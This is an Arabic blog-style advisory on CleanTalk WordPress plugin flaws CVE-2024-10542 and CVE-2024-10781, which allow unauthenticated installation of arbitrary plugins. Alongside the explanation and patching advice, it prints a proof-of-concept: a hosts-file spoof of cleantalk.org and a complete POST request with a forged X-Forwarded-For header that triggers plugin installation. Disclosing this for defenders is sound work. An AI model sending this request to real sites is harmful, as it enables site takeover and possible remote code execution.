
الإضافة WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 معرضة لثغرة تثبيت إضافي تعسفي بدون مصادقة.
المعلومات الواردة في هذا المستند بشأن CVE-2024-10542 هي لأغراض التعلم والتعليم فقط. نحن لا نشجع أو نصرح باستخدام هذه المعلومات لأي أغراض ضارة، بما في ذلك على سبيل المثال لا الحصر الاستغلال أو العبث بالأنظمة أو غيرها من الأنشطة غير القانونية.
في مشهد رقمي متزايد التعقيد، يعد ضمان أمان المواقع أمرًا بالغ الأهمية للعديد من مالكي المواقع. مؤخرًا، تم اكتشاف ثغرتين حرجتين تشكلان تهديدًا كبيرًا لمواقع ووردبريس. تؤثر هاتان الثغرتان على إضافة CleanTalk المعروفة، التي توفر الحماية من البريد العشوائي وإجراءات مكافحة البريد العشوائي وجدار الحماية. ما الذي يجعل هذا الوضع أكثر إلحاحًا؟ دعونا نتعمق أكثر! الثغرتان المسجلتان باسم CVE-2024-10542 و CVE-2024-10781 قد تسمحان للمهاجمين غير المصادق عليهم بتثبيت وتفعيل إضافات ضارة على المواقع المعرضة للخطر. وهذا لا يعرض سمعة الموقع للخطر فحسب، بل يفتح أيضًا الباب أمام المهاجمين لتنفيذ تعليمات برمجية عن بُعد. مع درجة CVSS تبلغ 9.8 من 10، من الواضح أن هاتين الثغرتين تقعان في فئة شديدة الخطورة. وفقًا لـ Wordfence، تتعلق كلتا الثغرتين بمشكلة تجاوز في التحقق من الهوية يمكن أن تسمح لفاعل خبيث بتثبيت وتفعيل إضافات عشوائية. وهذا بدوره قد يمهد الطريق لتنفيذ تعليمات برمجية عن بُعد إذا كانت الإضافة المُفعّلة تحتوي على ثغرة خاصة بها.
أولاً، سيضع المستخدمون الخبيثون ملف hosts على أنظمة التشغيل الخاصة بهم:
127.0.0.1 cleantalk.org
بعد ذلك يرسلون طلبًا مثل هذا
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
spbc_remote_call_action=install_plugin&plugin_name=apbct
الأمن السيبراني مسؤولية مشتركة تقع على عاتق كل مالك موقع. من خلال الحفاظ على تحديث الإضافات والبقاء يقظين تجاه الثغرات المحتملة، يمكننا حماية مواقعنا من الهجمات الخبيثة. تأكد من تحديث CleanTalk إلى أحدث إصدار وقم بإجراء فحوصات دورية على الإضافات الأخرى لضمان أقصى درجات الأمان. تذكر، الخطوات الصغيرة يمكن أن تمنع كوارث كبيرة!
الله، محمد صلى الله عليه وسلم، mikemyers، Markdown Monster، عائلتي، وأنت؟